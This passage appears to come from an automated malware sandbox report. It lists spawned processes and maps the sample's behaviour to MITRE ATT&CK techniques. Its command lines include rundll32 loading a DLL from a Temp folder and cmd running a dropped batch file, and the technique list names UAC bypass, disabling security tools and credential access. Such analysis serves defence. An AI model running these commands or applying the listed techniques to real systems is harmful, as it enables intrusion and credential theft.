  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 456
  2⤵
  - Program crash
  PID:1892

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2392 -ip 2392
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2620 -ip 2620
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5292 -ip 5292
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1548 -ip 1548
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1896 -ip 1896
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5892 -ip 5892
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 1944 -ip 1944
1⤵
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6004 -ip 6004
1⤵
PID:1448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5712 -ip 5712
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5480 -ip 5480
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5feb0322-1e56-4cc0-bab0-c9ce73d70666\test.bat"
1⤵
PID:6792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2548 -ip 2548
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 7052 -ip 7052
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3396

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Impair Defenses

T1562

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery